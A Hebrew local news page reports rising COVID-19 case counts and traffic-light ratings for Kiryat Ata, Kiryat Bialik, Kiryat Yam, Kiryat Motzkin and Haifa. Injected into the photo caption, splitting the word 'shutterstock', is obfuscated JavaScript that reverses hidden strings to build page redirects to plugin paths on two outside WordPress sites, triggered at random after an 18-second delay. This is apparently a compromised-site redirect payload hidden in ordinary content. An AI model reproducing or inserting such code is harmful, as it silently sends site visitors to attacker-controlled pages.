fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

קורונה בקריות: עלייה במספר מאומתי הקורונה בכל הקריות

על פי הנתונים, בכל הקריות ובחיפה נרשמה עלייה במספר חולי הקורונה. קרית אתא הפכה לעיר כתומה כשקרית מוצקין וחיפה עדיין ירוקות
נגיף קורונה אילוסטרציה | צילום: shutterstock
נגיף קורונה אילוסטרציה | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

על פי שיטת הרמזור להתפשטות נגיף הקורונה, עולה כי קרית אתא הפכה לעיר כתומה, קרית ביאליק וקרית ים הם ערים צהובות ואילוקרית מוצקין וחיפה עדיין מוגדרות כערים ירוקות.

נכון להיום (רביעי) בקרית אתא יש 52 חולי קורונה, עלייה 11 חולים מאתמול ו-7.3 חולים לכל 10,000 תושבים. שיעור הבדיקות החיוביות עומד על שלושה אחוזים.

בקרית ביאליק נרשמה עלייה של חמישה חולים וכיום יש בה 47 חולי קורונה פעילים ו-8.6 חולים לכל 10,000 תושבים. שיעור הבדיקות החיוביות הוא שני אחוזים.

בקרית ים ישנם 41 חולי קורונה פעילים, עלייה של שלושה חולים מאתמול  ו-7.9 חולים לכל 10,000 תושבים. שיעור הבדיקות החיוביות  הוא שלושה אחוזים.

בקרית מוצקין יש 30 חולי קורונה פעילים, עלייה של שלושה חולים לעומת אתמול ו-4.8 חולים לכל 10,000 תושבים. שיעור הבדיקות החיוביות הוא שני אחוזים.

בחיפה יש 158 חולי קורונה פעילים לעומת 132 אתמול ו-4.3 חולים לכל 10,000 תושבים. שיעור הבדיקות החיוביות הוא שני אחוזים.

לחדשות נוספות בהד הקריות לחצו כאן * לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות